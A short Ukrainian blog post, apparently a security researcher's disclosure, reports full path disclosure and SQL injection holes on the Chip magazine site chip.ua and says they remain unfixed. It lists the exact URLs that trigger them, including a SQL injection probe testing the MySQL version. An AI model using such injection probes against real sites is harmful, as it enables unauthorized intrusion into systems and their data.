Уразливості на chip.ua
19:20 14.04.201015.01.2008
У червні, 16.06.2007, я знайшов Full path disclosure і SQL Injection уразливості на http://chip.ua - сайті журнала Chip. Про що найближчим часом сповіщу адміністрацію сайта.
Детальна інформація про уразливості з’явиться пізніше.
14.04.2010
Full path disclosure:
http://chip.ua/?page=ce_ar&p=-1
http://chip.ua/?page=poll&id=’
SQL Injection:
http://chip.ua/?page=poll&id=39%20and%20version()%3E=5
Дані уразливості досі не виправлені. Причому, якщо шляхи на сервері та версію MySQL вони змінили за цей час, то дірки вони так і не виправили.